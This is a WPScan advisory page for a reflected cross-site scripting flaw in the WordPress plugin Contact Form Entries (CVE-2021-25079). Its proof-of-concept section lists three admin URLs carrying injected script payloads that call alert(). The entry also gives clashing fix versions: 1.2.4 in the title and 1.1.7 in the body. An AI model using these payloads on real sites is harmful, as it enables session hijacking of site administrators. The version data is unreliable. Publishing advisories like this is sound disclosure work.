WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Contact Form Entries < 1.2.4 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page

Proof of Concept

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F+ne97l&status&tab=entries&search&order=desc&orderby=fir+

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=&order=asc&orderby=file-438&field=&time=&start_date=&end_date=onobw%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez2u4g

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=e67x3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22oakfc&order=asc&orderby=file-438&field=&time=&start_date=&end_date=

Affects Plugins

contact-form-entries
Fixed in version 1.1.7

References

CVE
CVE-2021-25079
URL
https://plugins.trac.wordpress.org/changeset/2629442

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Gaetano Perrone

Submitter

Gaetano Perrone

Verified

Yes

WPVDB ID
c3d49271-9656-4428-8357-0d1d77b7fc63

Timeline

Publicly Published

2021-11-14 (about 10 months ago)

Added

2021-12-24 (about 9 months ago)

Last Updated

2022-04-10 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin